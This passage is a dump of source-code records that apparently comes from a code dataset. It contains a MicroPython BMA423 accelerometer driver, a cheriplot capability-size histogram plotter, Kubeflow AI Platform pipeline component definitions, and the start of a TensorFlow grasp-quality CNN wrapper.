bt=self.read_data(BMA4_DATA_8_ADDR,6)\n xyzraw=unpack(\"> 8 )\n lsb = 0xff % word\n data[index] = lsb\n data[index+1]= msb\n index += 2\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n \n @property\n def accel_range(self):\n tmp=self.read_byte(BMA4_ACCEL_CONFIG_ADDR + 1) & BMA4_ACCEL_RANGE_MSK\n range= 2 << tmp # 0 is 2g, 1 is 4G,,, 3 is 8G \n return range\n \n @staticmethod \n def bit_length(val):\n cnt=0\n while val != 0:\n cnt+=1\n val >>= 1\n return cnt \n \n @accel_range.setter \n def accel_range(self,val):\n range=(self.bit_length(val)-2) & BMA4_ACCEL_RANGE_MSK\n tmp=self.read_byte(BMA4_ACCEL_CONFIG_ADDR + 1) & ~BMA4_ACCEL_RANGE_MSK\n tmp |= range\n self.write_byte(BMA4_ACCEL_CONFIG_ADDR + 1,tmp)\n \n \n @property \n def step_count(self):\n data=self.read_data(BMA4_STEP_CNT_OUT_0_ADDR, BMA423_STEP_CNTR_DATA_SIZE)\n sc=unpack(\"> BMA423_STEP_DETECTOR_EN_POS\n\n @step_dedect_enabled.setter\n def step_dedect_enabled(self,value):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n tmp=data[BMA423_STEP_CNTR_OFFSET + 1]\n if value != 0:\n #print(\"step dedect enabled\")\n tmp |= BMA423_STEP_DETECTOR_EN_MSK\n else:\n tmp &= ~BMA423_STEP_DETECTOR_EN_MSK\n data[BMA423_STEP_CNTR_OFFSET + 1]=tmp\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n\n\n def feature_enable(self,feature,value=1):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n if not feature in feature_data:\n raise BMA4Error(\"no such feature %s \" % feature ) \n mask, offset=feature_data[feature]\n tmp=data[offset]\n if feature == 'any_motion':\n if value != 0:\n tmp &= ~mask\n else:\n tmp |= mask\n else:\n if value != 0:\n tmp |= mask\n else:\n tmp &= ~mask\n data[offset]=tmp\n if feature== 'any_motion' or feature=='no_motion':\n data[3] = data[3] & ( ~BMA423_ANY_NO_MOTION_AXIS_EN_MSK)\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n\n def feature_anymotion_axis(self,axis):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, 3)\n tmp=data[3]\n tmp &= (~BMA423_ANY_NO_MOTION_AXIS_EN_MSK)\n for i,a in enumerate(['x','y','z']):\n if a in axis:\n tmp |= 1 << (BMA423_ANY_NO_MOTION_AXIS_EN_POS + i)\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,3)\n\n\n\n @property \n def step_watermark(self):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n wmlsb=data[BMA423_STEP_CNTR_OFFSET]\n wmmsb=data[BMA423_STEP_CNTR_OFFSET+1]\n wm= ( wmlsb + (wmmsb << 8 ) ) & BMA423_STEP_CNTR_WM_MSK \n return wm\n\n @step_watermark.setter\n def step_watermark(self,value):\n data=self.read_data(BMA4_FEATURE_CONFIG_ADDR, BMA423_FEATURE_SIZE)\n wmlsb=data[BMA423_STEP_CNTR_OFFSET]\n wmmsb=data[BMA423_STEP_CNTR_OFFSET+1]\n wm= ( wmlsb + (wmmsb << 8 ) ) & ~BMA423_STEP_CNTR_WM_MSK \n wm |= ( value & BMA423_STEP_CNTR_WM_MSK)\n \n data[BMA423_STEP_CNTR_OFFSET] = wm & 0xff\n data[BMA423_STEP_CNTR_OFFSET + 1] = ( wm >> 8 ) & 0xff\n self.write_data(BMA4_FEATURE_CONFIG_ADDR,data)\n \n def int_status(self):\n is0=self.read_byte(BMA4_INT_STAT_0_ADDR)\n is1=self.read_byte(BMA4_INT_STAT_1_ADDR)\n return (is0,is1)\n \n def map_int(self,line,int,unmap=False):\n addr=[BMA4_INT_MAP_1_ADDR,BMA4_INT_MAP_2_ADDR][line]\n val=self.read_byte(addr)\n map= int & 0xff\n val &= ~map\n if not unmap:\n val |= int\n self.write_byte(addr,val)\n \n \n \n\nclass BMA423(BMA4):\n def __init__(self, i2c, address=BMA4_I2C_ADDR_SECONDARY):\n super(BMA423,self).__init__(i2c,address)\n if self.chip_id != BMA423_CHIP_ID:\n raise BMA4Error(\"chip id should be %02x instead of %02x\" % (BMA423_CHIP_ID,self.chip_id) )\n else:\n print(\"* BMA423 dedected\")\n self.resolution = 12\n self.feature_len = BMA423_FEATURE_SIZE\n self.variant = 1\n self.write_config_file()\n self.feature_config(BMA423_WRIST_SC_PARAM)\n self.write_byte(BMA4_INT1_IO_CTRL_ADDR,5) # level trigger, output enable\n self.write_byte(BMA4_INT2_IO_CTRL_ADDR,5)\n self.write_byte(BMA4_INTR_LATCH_ADDR,BMA4_LATCH_MODE)\n\n def write_config_file(self,fn=\"bma423.fw\"):\n super(BMA423,self).write_config_file(fn)\n\n\n\n \n","sub_path":"ports/esp32/modules/bma423.py","file_name":"bma423.py","file_ext":"py","file_size_in_byte":28406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"5726671","text":"#-\n# Copyright (c) 2017 Alfredo Mazzinghi\n# All rights reserved.\n#\n# This software was developed by SRI International and the University of\n# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237\n# (\"CTSRD\"), as part of the DARPA CRASH research programme.\n#\n# @BERI_LICENSE_HEADER_START@\n#\n# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor\n# license agreements. See the NOTICE file distributed with this work for\n# additional information regarding copyright ownership. BERI licenses this\n# file to you under the BERI Hardware-Software License, Version 1.0 (the\n# \"License\"); you may not use this file except in compliance with the\n# License. You may obtain a copy of the License at:\n#\n# http://www.beri-open-systems.org/legal/license-1-0.txt\n#\n# Unless required by applicable law or agreed to in writing, Work distributed\n# under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations under the License.\n#\n# @BERI_LICENSE_HEADER_END@\n#\n\nimport numpy as np\nimport pandas as pd\nimport logging\nimport os\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import text\nfrom matplotlib import patches\n\nfrom cheriplot.utils import ProgressPrinter\nfrom cheriplot.core.addrspace_axes import Range\nfrom cheriplot.core.label_manager import LabelManager\nfrom cheriplot.core.vmmap import VMMap\nfrom cheriplot.plot.provenance.provenance_plot import PointerProvenancePlot\n\nlogger = logging.getLogger(__name__)\n\nclass CapSizeHistogramPlot(PointerProvenancePlot):\n \"\"\"\n Vertical bar plot showing a bar for each mapped region of\n memory in the executable.\n Each vertical bar is subdivided in bins showing the amount\n of capabilities of size X referencing something in that mapped region.\n The vertical bars have fixed height, representing the 100% of the pointers\n in that region, the size of the bins is therefore the percentage of pointers\n to that region of size X.\n\n Variants:\n - remove roots, only keep globals (cfromptr)\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(CapSizeHistogramPlot, self).__init__(*args, **kwargs)\n\n self.vmmap = None\n \"\"\"VMMap object representing the process memory map.\"\"\"\n\n self.n_bins = [0, 10, 20, 21, 22, 23, 64]\n \"\"\"Bin edges for capability size, notice that the size is log2.\"\"\"\n\n self.norm_histogram = pd.DataFrame(columns=self.n_bins[1:])\n \"\"\"List of normalized histograms for each vmmap entry.\"\"\"\n\n self.abs_histogram = pd.DataFrame(columns=self.n_bins[1:])\n \"\"\"List of histograms for each vmmap entry.\"\"\"\n\n self.label_managers = []\n \"\"\"Manage vertical labels for each vertical column\"\"\"\n\n self.colormap = [plt.cm.Dark2(i) for i in\n np.linspace(0, 0.9, len(self.n_bins))]\n \"\"\"Set of colors to use.\"\"\"\n\n def init_axes(self):\n \"\"\"\n Build the figure and axes for the plot\n \"\"\"\n fig = plt.figure(figsize=(16,12))\n ax = fig.add_axes([0.05, 0.15, 0.9, 0.80,])\n return (fig, ax)\n\n def build_legend(self, handles):\n self.ax.legend(handles=handles, bbox_to_anchor=(0, 1.02, 1, 0.102),\n loc=3, ncol=9, mode=\"expand\", borderaxespad=0)\n\n def set_vmmap(self, mapfile):\n \"\"\"\n Use tha CSV file for the memory mapping, later we will\n switch to a dynamic vmmap extracted from the trace.\n \"\"\"\n self.vmmap = VMMap(mapfile)\n\n def on_draw(self, evt):\n \"\"\"\n Adjust labels at the side of the bars so they do not overlap.\n \"\"\"\n for mgr in self.label_managers:\n mgr.update_label_position(evt.renderer)\n\n def plot(self):\n \"\"\"\n Make the vertical bar plot using the histogram data\n \"\"\"\n step = 2\n positions = range(1, step*self.norm_histogram.shape[0] + 1, step)\n # init label managers and legend list\n for row in range(self.norm_histogram.shape[0]):\n self.label_managers.append(LabelManager(direction=\"vertical\"))\n # self.label_managers[-1].constraint = (0, np.inf)\n\n legend_handles = []\n bin_start = 0\n # skip the first column that holds the vmmap entry for the row\n # labels are set to \"2^-2^\"\n for idx,bin_limit in enumerate(self.norm_histogram.columns):\n label = \"2^%d-2^%d\" % (bin_start, bin_limit)\n bin_start = bin_limit\n handle = patches.Patch(color=self.colormap[idx], label=label)\n legend_handles.append(handle)\n self.build_legend(legend_handles)\n\n self.ax.set_xticks(np.array(positions))\n ticklabels = []\n for entry in self.norm_histogram.index:\n if entry.path:\n label_name = os.path.basename(entry.path)\n else:\n label_name = \"0x%x\" % entry.start\n ticklabel = \"(%s) %s\" % (entry.perms, label_name)\n ticklabels.append(ticklabel)\n self.ax.set_xticklabels(ticklabels, rotation=\"vertical\")\n self.ax.set_yticks([0, 1])\n self.ax.set_yticklabels([\"0\", \"100\"])\n self.ax.set_xlim(0, positions[-1] + 1)\n self.ax.set_ylim(0, 1.1)\n self.ax.set_xlabel(\"Mapped memory region\")\n\n # build the bars in the plot\n bottom = np.zeros(self.norm_histogram.shape[0])\n for bin_idx, bin_limit in enumerate(self.norm_histogram.columns):\n color = self.colormap[bin_idx]\n bar_slices = self.ax.bar(positions, self.norm_histogram[bin_limit],\n bottom=bottom, color=color)\n bottom = bottom + self.norm_histogram[bin_limit]\n # create text labels\n for bar_idx,hist_idx in enumerate(self.norm_histogram.index):\n bar = bar_slices[bar_idx]\n abs_bin = self.abs_histogram.at[hist_idx, bin_limit]\n # write the absolute count count at the left of each bar\n text_x = bar.get_x() - bar.get_width() / 2\n text_y = bar.get_y() + bar.get_height() / 2\n txt = self.ax.text(text_x, text_y, \" %d \" % abs_bin,\n ha=\"center\", va=\"center\",\n rotation=\"horizontal\")\n self.label_managers[bar_idx].labels.append(txt)\n\n self.fig.canvas.mpl_connect(\"draw_event\", self.on_draw)\n\n logger.debug(\"Plot build completed\")\n plt.savefig(self._get_plot_file())\n\n\nclass CapSizeCreationPlot(CapSizeHistogramPlot):\n \"\"\"\n Histogram plot that takes into account capabilities at creation time.\n The address space is split in chunks according to the VM map of the\n process. For each chunk, the set of capabilities that can be\n dereferenced in the chunk is computed. Note that the same capability may\n be counted in multiple chunks if it spans multiple VM map entries (eg DDC)\n From each set an histogram is generated and the bin count is used to produce\n the bar chart.\n \"\"\"\n\n def build_dataset(self):\n \"\"\"Process the provenance graph to extract histogram data.\"\"\"\n super(CapSizeCreationPlot, self).build_dataset()\n\n # indexes in the vmmap and in the norm_histograms are\n # the same.\n vm_entries = list(self.vmmap)\n vm_ranges = [Range(v.start, v.end) for v in self.vmmap]\n hist_data = [[] for _ in range(len(vm_entries))]\n\n progress = ProgressPrinter(self.dataset.num_vertices(),\n desc=\"Sorting capability references\")\n logger.debug(\"Vm ranges %s\", vm_ranges)\n for node in self.dataset.vertices():\n data = self.dataset.vp.data[node]\n for idx, r in enumerate(vm_ranges):\n if Range(data.cap.base, data.cap.bound) in r:\n hist_data[idx].append(data.cap.length)\n progress.advance()\n progress.finish()\n\n for vm_entry,data in zip(vm_entries, hist_data):\n logger.debug(\"hist entry len %d\", len(data))\n if len(data) == 0:\n continue\n # the bin size is logarithmic\n data = np.log2(data)\n h, b = np.histogram(data, bins=self.n_bins)\n # append histograms to the dataframe\n # self.hist_sources.append(vm_entry)\n # new_index = len(self.abs_histogram.index)\n self.abs_histogram.loc[vm_entry] = h\n self.norm_histogram.loc[vm_entry] = h / np.sum(h)\n\n def plot(self):\n self.ax.set_ylabel(\"Percentage of dereferenceable capabilities by size\")\n return super().plot()\n\n\nclass CapSizeDerefPlot(CapSizeHistogramPlot):\n \"\"\"\n Histogram plot that takes into account capabilities at dereference time.\n The address space is split in the same was as in\n :class:`CapSizeCreationPlot` but the each capability is assigned to\n a memory-mapped region based on its offset when it is dereferenced.\n Note that there is an amount of overcounting due to locations that\n are heavily accessed.\n \"\"\"\n\n def build_dataset(self):\n \"\"\"Process the provenance graph to extract histogram data.\"\"\"\n super(CapSizeDerefPlot, self).build_dataset()\n\n # indexes in the vmmap and in the norm_histograms are\n # the same.\n vm_entries = list(self.vmmap)\n vm_ranges = [Range(v.start, v.end) for v in self.vmmap]\n hist_data = [[] for _ in range(len(vm_ranges))]\n\n progress = ProgressPrinter(self.dataset.num_vertices(),\n desc=\"Sorting capability references\")\n for node in self.dataset.vertices():\n data = self.dataset.vp.data[node]\n # iterate over every dereference of the node\n for addr in data.deref[\"addr\"]:\n # check in which vm-entry the address is\n for idx, r in enumerate(vm_ranges):\n if addr in r:\n hist_data[idx].append(data.cap.length)\n break\n progress.advance()\n progress.finish()\n\n for vm_entry,data in zip(vm_entries, hist_data):\n if len(data) == 0:\n continue\n # the bin size is logarithmic\n data = np.log2(data)\n h, b = np.histogram(data, bins=self.n_bins)\n # append histogram to the dataframes\n # self.hist_sources.append(vm_entry)\n # new_index = len(self.abs_histogram.index)\n self.abs_histogram.loc[vm_entry] = h\n self.norm_histogram.loc[vm_entry] = h / np.sum(h)\n\n def plot(self):\n self.ax.set_ylabel(\"Percentage of dereferenced capabilities by size\")\n return super().plot()\n","sub_path":"cheriplot/plot/provenance/cap_size.py","file_name":"cap_size.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58447360","text":"# Copyright 2021 The Kubeflow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Core modules for AI Platform Pipeline Components.\"\"\"\n\nimport os\nfrom google.cloud import aiplatform as aiplatform_sdk\nfrom google_cloud_pipeline_components.aiplatform import utils\nfrom kfp import components\n\n\n__all__ = [\n 'ImageDatasetCreateOp',\n 'TabularDatasetCreateOp',\n 'TextDatasetCreateOp',\n 'VideoDatasetCreateOp',\n 'ImageDatasetExportDataOp',\n 'TabularDatasetExportDataOp',\n 'TextDatasetExportDataOp',\n 'VideoDatasetExportDataOp',\n 'ImageDatasetImportDataOp',\n 'TextDatasetImportDataOp',\n 'VideoDatasetImportDataOp',\n 'CustomContainerTrainingJobRunOp',\n 'CustomPythonPackageTrainingJobRunOp',\n 'AutoMLImageTrainingJobRunOp',\n 'AutoMLTextTrainingJobRunOp',\n 'AutoMLTabularTrainingJobRunOp',\n 'AutoMLVideoTrainingJobRunOp',\n 'ModelDeployOp',\n 'ModelBatchPredictOp',\n \"ModelExportOp\",\n 'ModelUploadOp',\n 'EndpointCreateOp',\n 'TimeSeriesDatasetCreateOp',\n 'TimeSeriesDatasetExportDataOp',\n 'AutoMLForecastingTrainingJobRunOp',\n]\n\nTimeSeriesDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.TimeSeriesDataset, aiplatform_sdk.TimeSeriesDataset.create\n)\n\nImageDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.ImageDataset, aiplatform_sdk.ImageDataset.create\n)\n\nTabularDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.TabularDataset, aiplatform_sdk.TabularDataset.create\n)\n\nTextDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.TextDataset, aiplatform_sdk.TextDataset.create\n)\n\nVideoDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.VideoDataset, aiplatform_sdk.VideoDataset.create\n)\n\nImageDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.ImageDataset,\n aiplatform_sdk.ImageDataset.export_data,\n)\n\nTabularDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TabularDataset,\n aiplatform_sdk.TabularDataset.export_data,\n)\n\nTimeSeriesDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TimeSeriesDataset,\n aiplatform_sdk.TimeSeriesDataset.export_data,\n)\n\nTextDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TextDataset,\n aiplatform_sdk.TextDataset.export_data,\n)\n\nVideoDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.VideoDataset,\n aiplatform_sdk.VideoDataset.export_data,\n)\n\nImageDatasetImportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.ImageDataset,\n aiplatform_sdk.ImageDataset.import_data,\n)\n\nTextDatasetImportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TextDataset,\n aiplatform_sdk.TextDataset.import_data,\n)\n\nVideoDatasetImportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.VideoDataset,\n aiplatform_sdk.VideoDataset.import_data,\n)\n\nCustomContainerTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.CustomContainerTrainingJob,\n aiplatform_sdk.CustomContainerTrainingJob.run,\n)\n\nCustomPythonPackageTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.CustomPythonPackageTrainingJob,\n aiplatform_sdk.CustomPythonPackageTrainingJob.run,\n)\n\nAutoMLImageTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLImageTrainingJob,\n aiplatform_sdk.AutoMLImageTrainingJob.run,\n)\n\nAutoMLTextTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLTextTrainingJob,\n aiplatform_sdk.AutoMLTextTrainingJob.run,\n)\n\nAutoMLTabularTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLTabularTrainingJob,\n aiplatform_sdk.AutoMLTabularTrainingJob.run,\n)\n\nAutoMLForecastingTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLForecastingTrainingJob,\n aiplatform_sdk.AutoMLForecastingTrainingJob.run,\n)\n\nAutoMLVideoTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLVideoTrainingJob,\n aiplatform_sdk.AutoMLVideoTrainingJob.run,\n)\n\nModelExportOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 'model/export_model/component.yaml'))\n\nModelDeployOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 'endpoint/deploy_model/component.yaml'))\n\nModelBatchPredictOp = components.load_component_from_file(\n os.path.join(os.path.dirname(__file__), 'batch_predict_job/component.yaml'))\n\nModelUploadOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 'model/upload_model/component.yaml'))\n\nEndpointCreateOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 'endpoint/create_endpoint/component.yaml'))\n","sub_path":"components/google-cloud/google_cloud_pipeline_components/aiplatform/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"122563266","text":"\"\"\"\nQuick wrapper for grasp quality neural network\nAuthor: Jeff Mahler\n\"\"\"\n\nimport copy\nimport json\nimport logging\nimport numpy as np\nimport os\nimport sys\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom autolab_core import YamlConfig\n\nimport optimizer_constants\nfrom optimizer_constants import InputDataMode\ndef reduce_shape(shape):\n \"\"\" Get shape of a layer for flattening \"\"\"\n shape = [x.value for x in shape[1:]]\n f = lambda x, y: 1 if y is None else x * y\n return reduce(f, shape, 1)\n\n\nclass GQCnnWeights(object):\n \"\"\" Struct helper for storing weights \"\"\"\n\n def __init__(self):\n pass\n\n\nclass GQCnnDenoisingWeights(object):\n \"\"\" Struct helper for storing weights \"\"\"\n\n def __init__(self):\n pass\n\n\nclass GQCNN(object):\n \"\"\" Wrapper for grasp quality CNN \"\"\"\n\n def __init__(self, config):\n \"\"\"\n Parameters\n ----------\n config :obj: dict\n python dictionary of configuration parameters such as architecure and basic data params such as batch_size for prediction,\n im_height, im_width, ...\n \"\"\"\n self._sess = None\n self._graph = tf.Graph()\n self._parse_config(config)\n\n @staticmethod\n def load(model_dir):\n \"\"\" Instantiates a GQCNN object using the model found in model_dir \n\n Parameters\n ----------\n model_dir :obj: str\n path to model directory where weights and architecture are stored\n\n Returns\n -------\n :obj:`GQCNN`\n GQCNN object initialized with the weights and architecture found in the specified model directory\n \"\"\"\n # get config dict with architecture and other basic configurations for GQCNN from config.json in model directory\n config_file = os.path.join(model_dir, 'config.json')\n with open(config_file) as data_file: \n train_config = json.load(data_file)\n\n gqcnn_config = train_config['gqcnn_config']\n\n # create GQCNN object and initialize weights and network\n gqcnn = GQCNN(gqcnn_config)\n gqcnn.init_weights_file(os.path.join(model_dir, 'model.ckpt'))\n gqcnn.initialize_network()\n gqcnn.init_mean_and_std(model_dir)\n\n return gqcnn\n\n def get_tf_graph(self):\n \"\"\" Returns the graph for this tf session \n\n Returns\n -------\n :obj:`tf Graph`\n TensorFlow Graph \n \"\"\"\n return self._graph\n\n def get_weights(self):\n \"\"\" Returns the weights for this network \n\n Returns\n -------\n :obj:`GQCnnWeights`\n network weights\n \"\"\"\n return self._weights\n\n def init_mean_and_std(self, model_dir):\n \"\"\" Initializes the mean and std to use for data normalization during prediction \n\n Parameters\n ----------\n model_dir :obj: str\n path to model directory where means and standard deviations are stored\n \"\"\"\n # load in means and stds for all 7 possible pose variables\n # grasp center row, grasp center col, gripper depth, grasp theta, crop center row, crop center col, grip width\n self._im_mean = np.load(os.path.join(model_dir, 'mean.npy'))\n self._im_std = np.load(os.path.join(model_dir, 'std.npy'))\n self._pose_mean = np.load(os.path.join(model_dir, 'pose_mean.npy'))\n self._pose_std = np.load(os.path.join(model_dir, 'pose_std.npy'))\n\n # slice out the variables we want based on the input pose_dim, which\n # is dependent on the input data mode used to train the model\n if self._input_data_mode == InputDataMode.TF_IMAGE:\n # depth\n self._pose_mean = self._pose_mean[2]\n self._pose_std = self._pose_std[2]\n elif self._input_data_mode == InputDataMode.TF_IMAGE_PERSPECTIVE:\n # depth, cx, cy\n self._pose_mean = np.concatenate([self._pose_mean[2:3], self._pose_mean[4:6]])\n self._pose_std = np.concatenate([self._pose_std[2:3], self._pose_std[4:6]])\n elif self._input_data_mode == InputDataMode.RAW_IMAGE:\n # u, v, depth, theta\n self._pose_mean = self._pose_mean[:4]\n self._pose_std = self._pose_std[:4]\n elif self._input_data_mode == InputDataMode.RAW_IMAGE_PERSPECTIVE:\n # u, v, depth, theta, cx, cy\n self._pose_mean = self._pose_mean[:6]\n self._pose_std = self._pose_std[:6]\n\n def init_weights_file(self, model_filename):\n \"\"\" Initialize network weights from the specified model \n\n Parameters\n ----------\n model_filename :obj: str\n path to model to be loaded into weights\n \"\"\"\n\n # read the input image\n with self._graph.as_default():\n\n # read in filenames\n reader = tf.train.NewCheckpointReader(model_filename)\n\n # create empty weight object\n self._weights = GQCnnWeights()\n\n # read in conv1 & conv2\n self._weights.conv1_1W = tf.Variable(reader.get_tensor(\"conv1_1W\"))\n self._weights.conv1_1b = tf.Variable(reader.get_tensor(\"conv1_1b\"))\n self._weights.conv1_2W = tf.Variable(reader.get_tensor(\"conv1_2W\"))\n self._weights.conv1_2b = tf.Variable(reader.get_tensor(\"conv1_2b\"))\n self._weights.conv2_1W = tf.Variable(reader.get_tensor(\"conv2_1W\"))\n self._weights.conv2_1b = tf.Variable(reader.get_tensor(\"conv2_1b\"))\n self._weights.conv2_2W = tf.Variable(reader.get_tensor(\"conv2_2W\"))\n self._weights.conv2_2b = tf.Variable(reader.get_tensor(\"conv2_2b\"))\n\n # if conv3 is to be used, read in conv3\n if self._use_conv3:\n self._weights.conv3_1W = tf.Variable(reader.get_tensor(\"conv3_1W\"))\n self._weights.conv3_1b = tf.Variable(reader.get_tensor(\"conv3_1b\"))\n self._weights.conv3_2W = tf.Variable(reader.get_tensor(\"conv3_2W\"))\n self._weights.conv3_2b = tf.Variable(reader.get_tensor(\"conv3_2b\"))\n\n # read in pc1\n self._weights.pc1W = tf.Variable(reader.get_tensor(\"pc1W\"))\n self._weights.pc1b = tf.Variable(reader.get_tensor(\"pc1b\"))\n\n # if pc2 is to be used, read in pc2\n if self._use_pc2:\n self._weights.pc2W = tf.Variable(reader.get_tensor(\"pc2W\"))\n self._weights.pc2b = tf.Variable(reader.get_tensor(\"pc2b\"))\n\n self._weights.fc3W = tf.Variable(reader.get_tensor(\"fc3W\"))\n self._weights.fc3b = tf.Variable(reader.get_tensor(\"fc3b\"))\n self._weights.fc4W_im = tf.Variable(reader.get_tensor(\"fc4W_im\"))\n self._weights.fc4W_pose = tf.Variable(reader.get_tensor(\"fc4W_pose\"))\n self._weights.fc4b = tf.Variable(reader.get_tensor(\"fc4b\"))\n self._weights.fc5W = tf.Variable(reader.get_tensor(\"fc5W\"))\n self._weights.fc5b = tf.Variable(reader.get_tensor(\"fc5b\"))\n\n def reinitialize_layers(self, reinit_fc3, reinit_fc4, reinit_fc5, reinit_pc1=False):\n \"\"\" Re-initializes final fully-connected layers for fine-tuning \n\n Parameters\n ----------\n reinit_fc3 : bool\n whether to re-initialize fc3\n reinit_fc4 : bool\n whether to re-initialize fc4\n reinit_fc5 : bool\n whether to re-initialize fc5\n reinit_pc1 : bool\n whether to re-initiazlize pc1\n \"\"\"\n with self._graph.as_default():\n if reinit_pc1:\n pc1_std = np.sqrt(2.0 / self.pc1_in_size)\n self._weights.pc1W = tf.Variable(tf.truncated_normal([self.pc1_in_size, self.pc1_out_size],\n stddev=pc1_std), name='pc1W')\n self._weights.pc1b = tf.Variable(tf.truncated_normal([self.pc1_out_size],\n stddev=pc1_std), name='pc1b')\n\n if reinit_fc3:\n fc3_std = np.sqrt(2.0 / (self.fc3_in_size))\n self._weights.fc3W = tf.Variable(tf.truncated_normal([self.fc3_in_size, self.fc3_out_size], stddev=fc3_std))\n self._weights.fc3b = tf.Variable(tf.truncated_normal([self.fc3_out_size], stddev=fc3_std)) \n if reinit_fc4:\n fc4_std = np.sqrt(2.0 / (self.fc4_in_size))\n self._weights.fc4W_im = tf.Variable(tf.truncated_normal([self.fc4_in_size, self.fc4_out_size], stddev=fc4_std))\n self._weights.fc4W_pose = tf.Variable(tf.truncated_normal([self.fc4_pose_in_size, self.fc4_out_size], stddev=fc4_std))\n self._weights.fc4b = tf.Variable(tf.truncated_normal([self.fc4_out_size], stddev=fc4_std))\n if reinit_fc5:\n fc5_std = np.sqrt(2.0 / (self.fc5_in_size))\n self._weights.fc5W = tf.Variable(tf.truncated_normal([self.fc5_in_size, self.fc5_out_size], stddev=fc5_std))\n self._weights.fc5b = tf.Variable(tf.constant(0.0, shape=[self.fc5_out_size]))\n \n def init_weights_gaussian(self):\n \"\"\" Initializes weights for network from scratch using Gaussian Distribution \"\"\"\n\n # init pool size variables\n cfg = self._architecture\n layer_height = self._im_height\n layer_width = self._im_width\n layer_channels = self._num_channels\n\n # conv1_1\n conv1_1_filt_dim = cfg['conv1_1']['filt_dim']\n conv1_1_num_filt = cfg['conv1_1']['num_filt']\n conv1_1_size = layer_height * layer_width * conv1_1_num_filt\n conv1_1_shape = [conv1_1_filt_dim, conv1_1_filt_dim, layer_channels, conv1_1_num_filt]\n\n conv1_1_num_inputs = conv1_1_filt_dim**2 * layer_channels\n conv1_1_std = np.sqrt(2.0 / (conv1_1_num_inputs))\n conv1_1W = tf.Variable(tf.truncated_normal(conv1_1_shape, stddev=conv1_1_std), name='conv1_1W')\n conv1_1b = tf.Variable(tf.truncated_normal([conv1_1_num_filt], stddev=conv1_1_std), name='conv1_1b')\n\n layer_height = layer_height / cfg['conv1_1']['pool_stride']\n layer_width = layer_width / cfg['conv1_1']['pool_stride']\n layer_channels = conv1_1_num_filt\n\n # conv1_2\n conv1_2_filt_dim = cfg['conv1_2']['filt_dim']\n conv1_2_num_filt = cfg['conv1_2']['num_filt']\n conv1_2_size = layer_height * layer_width * conv1_2_num_filt\n conv1_2_shape = [conv1_2_filt_dim, conv1_2_filt_dim, layer_channels, conv1_2_num_filt]\n\n conv1_2_num_inputs = conv1_2_filt_dim**2 * layer_channels\n conv1_2_std = np.sqrt(2.0 / (conv1_2_num_inputs))\n conv1_2W = tf.Variable(tf.truncated_normal(conv1_2_shape, stddev=conv1_2_std), name='conv1_2W')\n conv1_2b = tf.Variable(tf.truncated_normal([conv1_2_num_filt], stddev=conv1_2_std), name='conv1_2b')\n\n layer_height = layer_height / cfg['conv1_2']['pool_stride']\n layer_width = layer_width / cfg['conv1_2']['pool_stride']\n layer_channels = conv1_2_num_filt\n\n # conv2_1\n conv2_1_filt_dim = cfg['conv2_1']['filt_dim']\n conv2_1_num_filt = cfg['conv2_1']['num_filt']\n conv2_1_size = layer_height * layer_width * conv2_1_num_filt\n conv2_1_shape = [conv2_1_filt_dim, conv2_1_filt_dim, layer_channels, conv2_1_num_filt]\n\n conv2_1_num_inputs = 